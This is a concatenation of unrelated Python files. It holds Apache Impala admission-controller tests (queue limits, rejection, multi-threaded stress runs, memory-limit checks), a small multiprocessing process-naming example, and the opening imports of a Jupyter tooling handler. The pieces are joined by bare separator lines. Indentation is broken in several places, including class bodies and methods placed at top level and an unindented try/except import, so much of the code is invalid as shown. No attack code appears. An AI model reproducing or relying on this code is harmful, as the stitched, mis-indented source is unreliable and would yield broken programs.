  # Submit a batch of queries. One should get to run, one will be rejected because
  # of the full queue, and the others will run after being queued.
  STMT = "select sleep(100)"
  TIMEOUT_S = 60
  NUM_QUERIES = 5
  profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
      TIMEOUT_S, allow_query_failure=True)
  ADMITTED_STALENESS_WARNING = \
      "Warning: admission control information from statestore is stale"
  ADMITTED_STALENESS_PROFILE_ENTRY = \
      "Admission control state staleness: " + ADMITTED_STALENESS_WARNING

  # Classify every profile as admitted-immediately / rejected / queued, and verify
  # each carries the staleness diagnostic in the appropriate place.
  num_queued = 0
  num_admitted_immediately = 0
  num_rejected = 0
  for profile in profiles:
    if "Admission result: Admitted immediately" in profile:
      assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
      num_admitted_immediately += 1
    elif "Admission result: Rejected" in profile:
      num_rejected += 1
      # Check that the rejection error returned to the client contains a warning.
      query_statuses = [line for line in profile.split("\n")
                        if "Query Status:" in line]
      assert len(query_statuses) == 1, profile
      assert ADMITTED_STALENESS_WARNING in query_statuses[0]
    else:
      assert "Admission result: Admitted (queued)" in profile, profile
      assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
      # Check that the queued reason contains a warning.
      queued_reasons = [line for line in profile.split("\n")
                        if "Initial admission queue reason:" in line]
      assert len(queued_reasons) == 1, profile
      assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
      num_queued += 1
  # Expected split per the max_requests=1/max_queued=3 configuration: 1 running,
  # 3 queued, and the remainder (1) rejected on the full queue.
  assert num_admitted_immediately == 1
  assert num_queued == 3
  assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
  """This test verifies that queries get queued when the coordinator has already
  started accepting client connections during startup, but the local backend
  descriptor is not yet available."""
  startup_delay_s = 20

  # We need to start the cluster here instead of during setup_method() so we can
  # launch it from a separate thread.
  def delayed_cluster_start():
    LOG.info("Starting cluster")
    debug_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
        1000 * startup_delay_s)
    self._start_impala_cluster(['--impalad_args=%s' % debug_args])

  # Initiate the cluster start in the background.
  cluster_thread = threading.Thread(target=delayed_cluster_start)
  cluster_thread.start()
  # Wait some time to arrive at IMPALA_SERVER_END_OF_START.
  sleep(startup_delay_s)
  # With a new client, execute a query and observe that it gets queued and
  # ultimately succeeds.
  client = self.create_impala_client()
  result = self.execute_query_expect_success(client, "select 1")
  cluster_thread.join()
  queue_reasons = self.__extract_init_queue_reasons([result.runtime_profile])
  assert len(queue_reasons) == 1
  assert "Local backend has not started up yet." in queue_reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
  """Test that executor backends are shutdown when they complete, that completed
  executor backends release their admitted memory, and that
  NumCompletedBackends is updated each time an executor backend completes."""
  if self.exploration_strategy() != 'exhaustive':
    pytest.skip('runs only in exhaustive')
  # Craft a query where part of the executor backends completes, while the rest remain
  # running indefinitely. The query forces the 'lineitem' table to be treated as the
  # small table even though it is bigger than the 'customer' table. This forces the
  # small table scan ('lineitem' scan) to run on two nodes and the big table scan
  # ('customers' scan) to run on a single node. By using debug actions to force the
  # big table scan to hang indefinitely, the small table scan should finish quickly.
  # This causes one executor backend to complete quickly, and causes the other one to
  # hang.
  vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
  query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
      "tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
  # Amount of time to wait for the query to reach the running state before throwing a
  # Timeout exception.
  timeout = 10
  handle = self.execute_query_async(query, vector.get_value('exec_option'))
  try:
    # Wait for the query to reach the running state (it should never reach the finished
    # state because of the 'WAIT' debug action), wait for the 'lineitem' scan to
    # complete, and then validate that one of the executor backends shutdowns and
    # releases its admitted memory.
    self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
    # Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
    self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
        in self.client.get_runtime_profile(handle))
    # BUG FIX: this comparison was previously a bare expression statement, so its
    # result was silently discarded and a wrong backend count could never fail the
    # test. Assert it explicitly.
    assert get_num_completed_backends(self.cluster.impalads[0].service,
        handle.get_handle().id) == 1
    # Exactly one executor should have released (zeroed) its admitted memory.
    mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
    num_executor_zero_admitted = 0
    for executor_mem_admitted in mem_admitted['executor']:
      if executor_mem_admitted == 0:
        num_executor_zero_admitted += 1
    assert num_executor_zero_admitted == 1
  finally:
    # Once the query is closed, validate that all backends have shutdown.
    self.client.close_query(handle)
    mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
    assert mem_admitted['coordinator'] == 0
    for executor_mem_admitted in mem_admitted['executor']:
      assert executor_mem_admitted == 0
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
  """Adds the stress-test dimensions and constrains them for code-coverage and
  core exploration runs."""
  super(TestAdmissionControllerStress, cls).add_test_dimensions()
  matrix = cls.ImpalaTestMatrix
  for dim_name, dim_values in (('num_queries', NUM_QUERIES),
                               ('round_robin_submission', ROUND_ROBIN_SUBMISSION),
                               ('submission_delay_ms', SUBMISSION_DELAY_MS)):
    matrix.add_dimension(ImpalaTestDimension(dim_name, *dim_values))
  # Additional constraints for code coverage jobs and core.
  if ImpalaTestClusterProperties.get_instance().has_code_coverage():
    # Code coverage builds can't handle the increased concurrency.
    num_queries = 15
  elif cls.exploration_strategy() == 'core':
    num_queries = 30
  else:
    num_queries = None
  matrix.add_constraint(lambda v: v.get_value('submission_delay_ms') == 0)
  matrix.add_constraint(lambda v: v.get_value('round_robin_submission'))
  if num_queries is not None:
    # Bind num_queries as a default argument to avoid late-binding surprises.
    matrix.add_constraint(
        lambda v, n=num_queries: v.get_value('num_queries') == n)
def setup(self):
  """Initializes the per-test thread bookkeeping shared with the query threads."""
  # Every submission thread registers itself here so teardown() can make sure we
  # clean them all up.
  self.all_threads = []
  # Submission threads append() themselves here once their query begins execution.
  # The main thread pops elements from the front to pick queries to cancel. The
  # individual list operations are atomic and thread-safe thanks to the GIL.
  self.executing_threads = []
def teardown(self):
  """Requests every submission thread to shut down (cancelling its query if one is
  still open) and then waits, bounded, for the threads to exit."""
  # Set shutdown for all threads (cancel if needed)
  for thread in self.all_threads:
    try:
      # thread.lock protects query_handle and shutdown against concurrent access
      # by the submission thread itself (see SubmitQueryThread.run()).
      thread.lock.acquire()
      thread.shutdown = True
      if thread.query_handle is not None:
        LOG.debug("Attempt to clean up thread executing query %s (state %s)",
            thread.query_num, thread.query_state)
        # Use a fresh client for the cancel: the thread owns its own client.
        client = thread.impalad.service.create_beeswax_client()
        try:
          client.cancel(thread.query_handle)
        finally:
          client.close()
    finally:
      thread.lock.release()
  # Wait for all threads to exit
  for thread in self.all_threads:
    # Bounded join (5s); a stuck thread is logged but does not hang teardown.
    thread.join(5)
    LOG.debug("Join thread for query num %s %s", thread.query_num,
        "TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
  """
  Returns a map of the admission metrics, aggregated across all of the impalads.

  The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
  'rejected', 'released', and 'timed-out'.
  """
  metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0,
             'released': 0, 'timed-out': 0}
  # The metric keys are identical for every impalad, so build them once outside the
  # loop instead of re-deriving them per daemon (loop-invariant hoist).
  keys = [metric_key(self.pool_name, 'total-%s' % short_name)
          for short_name in metrics.keys()]
  for impalad in self.impalads:
    # Missing metrics default to 0 so a freshly-started daemon contributes nothing.
    values = impalad.service.get_metric_values(keys, [0] * len(keys))
    # zip() pairs each value back with its short name; keys() order is stable here
    # because the key set of 'metrics' is never modified.
    for short_name, value in zip(metrics.keys(), values):
      metrics[short_name] += value
  return metrics
def get_consistent_admission_metrics(self, num_submitted):
  """Same as get_admission_metrics() except retries until it gets consistent metrics
  for num_submitted queries. See IMPALA-6227 for an example of problems with
  inconsistent metrics where a dequeued query is reflected in dequeued but not
  admitted."""
  ATTEMPTS = 5
  metrics = None
  for _ in xrange(ATTEMPTS):
    metrics = self.get_admission_metrics()
    # Consistency invariant: (immediately admitted) + dequeued == admitted.
    immediate = num_submitted - metrics['queued'] - metrics['rejected']
    if immediate + metrics['dequeued'] == metrics['admitted']:
      return metrics
    LOG.info("Got inconsistent metrics {0}".format(metrics))
  assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
      "{2}".format(num_submitted, ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
  """
  Waits for the sum of metrics in metric_names to change by at least expected_delta.

  This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
  metrics aggregated across all impalads, e.g. we want to wait for the total number of
  admitted, queued, and rejected metrics to change some amount in total, but we don't
  know exactly how the metrics will change individually.
  'metric_names' is a list of the keys returned by get_admission_metrics() which are
  expected to change.
  'initial' is the initial set of metrics returned by get_admission_metrics() to
  compare against.
  'expected_delta' is the total change expected across all impalads for the specified
  metrics.
  Returns (deltas, current): the per-metric delta map and the last metrics snapshot.
  """
  log_metrics("wait_for_metric_changes, initial=", initial)
  # NOTE: the old dead pre-assignment 'current = initial' was removed; 'current' is
  # always assigned fresh at the top of each loop iteration.
  start_time = time()
  while True:
    current = self.get_admission_metrics()
    log_metrics("wait_for_metric_changes, current=", current)
    deltas = compute_metric_deltas(current, initial)
    delta_sum = sum([deltas[x] for x in metric_names])
    LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
        delta_sum, deltas, expected_delta, metric_names)
    if delta_sum >= expected_delta:
      LOG.info("Found all %s metrics after %s seconds", delta_sum,
          round(time() - start_time, 1))
      return (deltas, current)
    assert (time() - start_time < STRESS_TIMEOUT),\
        "Timed out waiting {0} seconds for metrics {1} delta {2} "\
        "current {3} initial {4}" .format(
        STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
        str(initial))
    sleep(1)
def wait_for_statestore_updates(self, heartbeats):
  """Waits until every impalad has received at least 'heartbeats' additional
  admission-control statestore updates, failing after STRESS_TIMEOUT seconds."""
  start_time = time()

  def snapshot_counts():
    # One metric fetch per impalad, keyed by the impalad object.
    return dict((i, i.service.get_metric_value(
        REQUEST_QUEUE_UPDATE_INTERVAL)['count']) for i in self.impalads)

  init = snapshot_counts()
  curr = dict(init)
  while True:
    LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
        init.values(), [curr[i] - init[i] for i in self.impalads])
    if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
    curr = snapshot_counts()
    assert (time() - start_time < STRESS_TIMEOUT),\
        "Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
    sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
  LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
  """
  Wait for query submission threads to update after being admitted, as determined
  by observing metric changes. This is necessary because the metrics may change
  before the execute_async() calls on the query threads return and add themselves
  to self.executing_threads.
  """
  start_time = time()
  LOG.info("Waiting for %s threads to begin execution", num_threads)
  # len() on a list is atomic under the GIL, so no lock is needed even though
  # other threads may be append()ing concurrently.
  while True:
    if len(self.executing_threads) >= num_threads:
      break
    assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
        "%s admitted client rpcs to return. Only %s executing " % (
        STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
    sleep(0.1)
  LOG.info("Found all %s admitted threads after %s seconds", num_threads,
      round(time() - start_time, 1))
def end_admitted_queries(self, num_queries):
  """
  Requests each admitted query to end its query.
  """
  assert len(self.executing_threads) >= num_queries
  LOG.info("Requesting {0} clients to end queries".format(num_queries))
  # Request admitted clients to end their queries.
  requested = []
  for _ in xrange(num_queries):
    # pop() is thread-safe, it's OK if another thread is appending concurrently.
    thread = self.executing_threads.pop(0)
    LOG.info("Cancelling query %s", thread.query_num)
    assert thread.query_state == 'ADMITTED'
    requested.append(thread)
    thread.query_state = 'REQUEST_QUERY_END'
  # Wait for the queries to end: a thread leaves the REQUEST_QUERY_END state once
  # it has finished ending its query.
  start_time = time()
  while any(t.query_state == 'REQUEST_QUERY_END' for t in self.all_threads):
    assert (time() - start_time < STRESS_TIMEOUT),\
        "Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
    sleep(1)
class SubmitQueryThread(threading.Thread):
  """Thread that submits one query to a single impalad, records the admission
  outcome in query_state, and then keeps the query alive until the main test
  thread requests (via query_state/shutdown) that it end the query."""

  def __init__(self, impalad, additional_query_options, vector, query_num,
      query_end_behavior, executing_threads):
    """
    executing_threads must be provided so that this thread can add itself when the
    query is admitted and begins execution.
    """
    # NOTE(review): super(self.__class__, ...) breaks under further subclassing;
    # left as-is since this class is only instantiated directly here.
    super(self.__class__, self).__init__()
    self.executing_threads = executing_threads
    self.vector = vector
    self.additional_query_options = additional_query_options
    self.query_num = query_num
    # One of QUERY_END_BEHAVIORS: how the query is brought to an end.
    self.query_end_behavior = query_end_behavior
    self.impalad = impalad
    # Any unexpected exception is stored here and re-raised by the main thread.
    self.error = None
    # query_state is defined and used only by the test code, not a property exposed by
    # the server
    self.query_state = 'NOT_SUBMITTED'
    # lock protects query_handle and shutdown, used by the main thread in teardown()
    self.lock = threading.RLock()
    self.query_handle = None
    self.shutdown = False  # Set by the main thread when tearing down

  def run(self):
    """Submits the query and then loops, keeping it alive, until told to end it."""
    client = None
    try:
      try:
        # Take the lock while query_handle is being created to avoid an unlikely race
        # condition with teardown() (i.e. if an error occurs on the main thread), and
        # check if the test is already shut down.
        self.lock.acquire()
        if self.shutdown:
          return

        exec_options = self.vector.get_value('exec_option')
        exec_options.update(self.additional_query_options)
        query = QUERY.format(self.query_num)
        self.query_state = 'SUBMITTING'
        client = self.impalad.service.create_beeswax_client()
        ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
        client.set_configuration(exec_options)

        if self.query_end_behavior == 'QUERY_TIMEOUT':
          client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))

        LOG.info("Submitting query %s", self.query_num)
        self.query_handle = client.execute_async(query)
        client.wait_for_admission_control(self.query_handle)
        admission_result = client.get_admission_result(self.query_handle)
        assert len(admission_result) > 0
        # Rejected / timed-out queries terminate this thread immediately; the
        # handle is cleared so teardown() does not try to cancel them.
        if "Rejected" in admission_result:
          LOG.info("Rejected query %s", self.query_num)
          self.query_state = 'REJECTED'
          self.query_handle = None
          return
        elif "Timed out" in admission_result:
          LOG.info("Query %s timed out", self.query_num)
          self.query_state = 'TIMED OUT'
          self.query_handle = None
          return
        LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
      except ImpalaBeeswaxException as e:
        LOG.exception(e)
        raise e
      finally:
        self.lock.release()
      LOG.info("Admitted query %s", self.query_num)
      self.query_state = 'ADMITTED'
      # The thread becomes visible to the main thread when it is added to the
      # shared list of executing_threads. append() is atomic and thread-safe.
      self.executing_threads.append(self)

      # Synchronize with the main thread. At this point, the thread is executing a
      # query. It needs to wait until the main thread requests it to end its query.
      while not self.shutdown:
        # The QUERY_TIMEOUT needs to stay active until the main thread requests it
        # to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
        # per QUERY_TIMEOUT interval to keep the query active.
        if self.query_end_behavior == 'QUERY_TIMEOUT' and \
           self.query_state != 'COMPLETED':
          fetch_result = client.fetch(query, self.query_handle, 1)
          assert len(fetch_result.data) == 1, str(fetch_result)
        if self.query_state == 'REQUEST_QUERY_END':
          self._end_query(client, query)
          # The query has released admission control resources
          self.query_state = 'COMPLETED'
          self.query_handle = None
        sleep(QUERY_END_TIMEOUT_S * 0.5)
    except Exception as e:
      LOG.exception(e)
      # Unknown errors will be raised later
      self.error = e
      self.query_state = 'ERROR'
    finally:
      LOG.info("Thread terminating in state=%s", self.query_state)
      if client is not None:
        client.close()

  def _end_query(self, client, query):
    """Bring the query to the appropriate end state defined by self.query_end_behaviour.
    Returns once the query has reached that state."""
    LOG.info("Ending query %s by %s",
        str(self.query_handle.get_handle()), self.query_end_behavior)
    if self.query_end_behavior == 'QUERY_TIMEOUT':
      # Sleep and wait for the query to be cancelled. The cancellation will
      # set the state to EXCEPTION.
      start_time = time()
      while (client.get_state(self.query_handle) !=
             client.QUERY_STATES['EXCEPTION']):
        assert (time() - start_time < STRESS_TIMEOUT),\
          "Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
        sleep(1)
    elif self.query_end_behavior == 'EOS':
      # Fetch all rows so we hit eos.
      client.fetch(query, self.query_handle)
    elif self.query_end_behavior == 'CLIENT_CANCEL':
      client.cancel(self.query_handle)
    else:
      assert self.query_end_behavior == 'CLIENT_CLOSE'
      client.close_query(self.query_handle)
def _check_queries_page_resource_pools(self):
  """Checks that all queries in the '/queries' webpage json have the correct resource
  pool (this is called after all queries have been admitted, queued, or rejected, so
  they should already have the pool set), or no pool for queries that don't go through
  admission control."""
  for impalad in self.impalads:
    page = impalad.service.get_debug_webpage_json('/queries')
    all_queries = itertools.chain(page['in_flight_queries'],
                                  page['completed_queries'])
    for query in all_queries:
      if query['stmt_type'] in ('QUERY', 'DML'):
        # Queries/DML go through admission control and must have moved past the
        # registration/planning events and carry the test's pool name.
        assert query['last_event'] not in ('Registered', 'Planning finished')
        assert query['resource_pool'] == self.pool_name
      else:
        assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
  """Returns the number of queries currently in the 'queued' state from the '/queries'
  webpage json"""
  total = 0
  for impalad in self.impalads:
    in_flight = impalad.service.get_debug_webpage_json('/queries')['in_flight_queries']
    total += sum(1 for q in in_flight if q['last_event'] == 'Queued')
  return total
def run_admission_test(self, vector, additional_query_options):
  """Drives the full stress scenario: submits 'num_queries' queries (one thread
  each), verifies the initial admitted/queued/rejected split via the aggregated
  metrics and the /queries page, ends queries in waves until all have run, and
  finally checks the aggregate metrics. 'additional_query_options' is merged into
  each query's exec options (e.g. request_pool, mem_limit)."""
  LOG.info("Starting test case with parameters: %s", vector)
  self.impalads = self.cluster.impalads
  round_robin_submission = vector.get_value('round_robin_submission')
  submission_delay_ms = vector.get_value('submission_delay_ms')
  # Without round-robin, every query goes to the first impalad only.
  if not round_robin_submission:
    self.impalads = [self.impalads[0]]

  num_queries = vector.get_value('num_queries')
  assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
  initial_metrics = self.get_admission_metrics()
  log_metrics("Initial metrics: ", initial_metrics)

  # Fan out one SubmitQueryThread per query, cycling over the target impalads and
  # the query-end behaviors.
  for query_num in xrange(num_queries):
    impalad = self.impalads[query_num % len(self.impalads)]
    query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
    thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
        query_num, query_end_behavior, self.executing_threads)
    thread.start()
    self.all_threads.append(thread)
    sleep(submission_delay_ms / 1000.0)

  # Wait for the admission control to make the initial admission decision for all of
  # the queries. They should either be admitted immediately, queued, or rejected.
  # The test query is chosen that it with remain active on all backends until the test
  # ends the query. This prevents queued queries from being dequeued in the background
  # without this thread explicitly ending them, so that the test can admit queries in
  # discrete waves.
  LOG.info("Wait for initial admission decisions")
  (metric_deltas, curr_metrics) = self.wait_for_metric_changes(
      ['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
  # Also wait for the test threads that submitted the queries to start executing.
  self.wait_for_admitted_threads(metric_deltas['admitted'])

  # Check that the admission decisions are reasonable given the test parameters
  # The number of admitted and queued requests should be at least the configured limits
  # but less than or equal to those limits times the number of impalads.
  assert metric_deltas['dequeued'] == 0,\
      "Queued queries should not run until others are made to finish"
  assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
      "Admitted fewer than expected queries"
  assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
      "Admitted more than expected queries: at least one daemon over-admitted"
  assert metric_deltas['queued'] >=\
      min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
      "Should have queued more queries before rejecting them"
  assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
      "Queued too many queries: at least one daemon queued too many"
  assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
      metric_deltas['queued'] == num_queries,\
      "Initial admission decisions don't add up to {0}: {1}".format(
      num_queries, str(metric_deltas))
  initial_metric_deltas = metric_deltas

  # Like above, check that the count from the queries webpage json is reasonable.
  queries_page_num_queued = self._get_queries_page_num_queued()
  assert queries_page_num_queued >=\
      min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
  assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
  self._check_queries_page_resource_pools()

  # Admit queries in waves until all queries are done. A new wave of admission
  # is started by killing some of the running queries.
  while len(self.executing_threads) > 0:
    curr_metrics = self.get_consistent_admission_metrics(num_queries)
    log_metrics("Main loop, curr_metrics: ", curr_metrics)
    num_to_end = len(self.executing_threads)
    LOG.info("Main loop, will request %s queries to end", num_to_end)
    self.end_admitted_queries(num_to_end)
    self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)

    # Ending queries frees capacity: expect up to MAX_NUM_CONCURRENT_QUERIES of
    # the still-queued queries to be admitted in this wave.
    num_queued_remaining =\
        curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
    expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
    (metric_deltas, _) = self.wait_for_metric_changes(
        ['admitted', 'timed-out'], curr_metrics, expected_admitted)
    # The queue timeout is set high for these tests, so we don't expect any queries to
    # time out.
    assert metric_deltas['admitted'] >= expected_admitted
    assert metric_deltas['timed-out'] == 0
    self.wait_for_admitted_threads(metric_deltas['admitted'])
    # Wait a few topic updates to ensure the admission controllers have reached a steady
    # state or we may find an impalad dequeue more requests after we capture metrics.
    self.wait_for_statestore_updates(10)

  final_metrics = self.get_consistent_admission_metrics(num_queries)
  log_metrics("Final metrics: ", final_metrics)
  metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
  assert metric_deltas['timed-out'] == 0

  if round_robin_submission:
    min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
    assert metric_deltas['admitted'] >= min_expected_admitted
    assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
    assert metric_deltas['admitted'] ==\
        initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
    assert metric_deltas['queued'] == initial_metric_deltas['queued']
    assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
  else:
    # We shouldn't go over the max number of queries or queue size so we can compute
    # the expected number of queries that should have been admitted (which includes the
    # number queued as they eventually get admitted as well), queued, and rejected
    expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
    assert metric_deltas['admitted'] == expected_admitted
    assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
    assert metric_deltas['rejected'] == num_queries - expected_admitted

  # All queries should be completed by now.
  queries_page_num_queued = self._get_queries_page_num_queued()
  assert queries_page_num_queued == 0
  self._check_queries_page_resource_pools()

  # Surface any error a submission thread recorded.
  for thread in self.all_threads:
    if thread.error is not None:
      raise thread.error
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
  impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
    max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
  statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
  """Stress run against a cluster configured purely through startup flags."""
  if self.exploration_strategy() != 'exhaustive':
    pytest.skip('runs only in exhaustive')
  self.pool_name = 'default-pool'
  # The pool has no mem resources set, so submitting queries with huge mem_limits
  # should be fine. This exercises the code that does the per-pool memory
  # accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
  query_options = {'request_pool': self.pool_name, 'mem_limit': sys.maxint}
  self.run_admission_test(vector, query_options)
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
  impalad_args=impalad_admission_ctrl_config_args(
    fs_allocation_file="fair-scheduler-test2.xml",
    llama_site_file="llama-site-test2.xml"),
  statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
  """Stress run against a cluster configured via fair-scheduler/llama-site files."""
  self.pool_name = 'root.queueB'
  query_options = {'request_pool': self.pool_name}
  self.run_admission_test(vector, query_options)
def get_proc_limit(self):
  """Gets the process mem limit as reported by the impalad's mem-tracker metric.
  Raises an assertion if not all impalads have the same value."""
  limit_metrics = []
  for impalad in self.cluster.impalads:
    limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
  # BUG FIX: the old check compared only limit_metrics[0] == limit_metrics[-1],
  # which misses a divergent value on any middle impalad. Compare every daemon
  # against the first, as the docstring promises.
  assert all(limit == limit_metrics[0] for limit in limit_metrics),\
      "Not all impalads have the same process limit: %s" % (limit_metrics,)
  assert limit_metrics[0] is not None
  return limit_metrics[0]
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
  impalad_args=impalad_admission_ctrl_flags(
    max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
    pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
    queue_wait_timeout_ms=600000),
  statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
  """Stress run where admission decisions are driven by memory limits rather than
  by the (deliberately very high) request-count limit."""
  # Impala may set the proc mem limit lower than we think depending on the overcommit
  # settings of the OS. It should be fine to continue anyway.
  proc_limit = self.get_proc_limit()
  if proc_limit != MEM_TEST_LIMIT:
    LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
        MEM_TEST_LIMIT)
  self.pool_name = 'default-pool'
  # Each query mem limit (set the query option to override the per-host memory
  # estimate) should use a bit less than (total pool mem limit) / #queries so that
  # once #queries are running, the total pool mem usage is about at the limit and
  # additional incoming requests will be rejected. The actual pool limit on the number
  # of running requests is very high so that requests are only queued/rejected due to
  # the mem limit.
  num_impalads = len(self.cluster.impalads)
  query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
  query_options = {'request_pool': self.pool_name, 'mem_limit': query_mem_limit}
  self.run_admission_test(vector, query_options)
|
multiprocessing_names.py | import multiprocessing
import time
def worker():
    """Announce start, idle for two seconds, then announce exit (tagged with the process name)."""
    proc_name = multiprocessing.current_process().name
    print(proc_name, "Starting")
    time.sleep(2)
    print(proc_name, "Exiting")
def my_service():
    """Announce start, idle for three seconds, then announce exit (tagged with the process name)."""
    proc_name = multiprocessing.current_process().name
    print(proc_name, "Starting")
    time.sleep(3)
    print(proc_name, "Exiting")
if __name__ == "__main__":
    # Create the processes in the same order as before so the auto-generated
    # default name of the unnamed worker (e.g. "Process-3") stays stable.
    service = multiprocessing.Process(name="my_service", target=my_service)
    first_worker = multiprocessing.Process(name="worker 1", target=worker)
    second_worker = multiprocessing.Process(target=worker)  # keeps default name
    # Start the workers first, the service last — same order as the original.
    for proc in (first_worker, second_worker, service):
        proc.start()
tooling_handler.py | import glob
import json
import os
import subprocess
import threading
import time
import warnings
from datetime import datetime
from subprocess import call
import git
import tornado
from notebook.base.handlers import IPythonHandler
from notebook.utils import url_path_join
from tornado import web
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
# Route (relative to base_url) that serves the token-protected SSH setup script.
SHARED_SSH_SETUP_PATH = "/shared/ssh/setup"
# Filesystem roots, overridable via environment for non-default deployments.
HOME = os.getenv("HOME", "/root")
RESOURCES_PATH = os.getenv("RESOURCES_PATH", "/resources")
WORKSPACE_HOME = os.getenv("WORKSPACE_HOME", "/workspace")
WORKSPACE_CONFIG_FOLDER = os.path.join(HOME, ".workspace")
# Size limits (GB) for the storage check; only applied when the env var is a
# plain non-negative integer, otherwise the limit is disabled (None).
MAX_WORKSPACE_FOLDER_SIZE = os.getenv("MAX_WORKSPACE_FOLDER_SIZE", None)
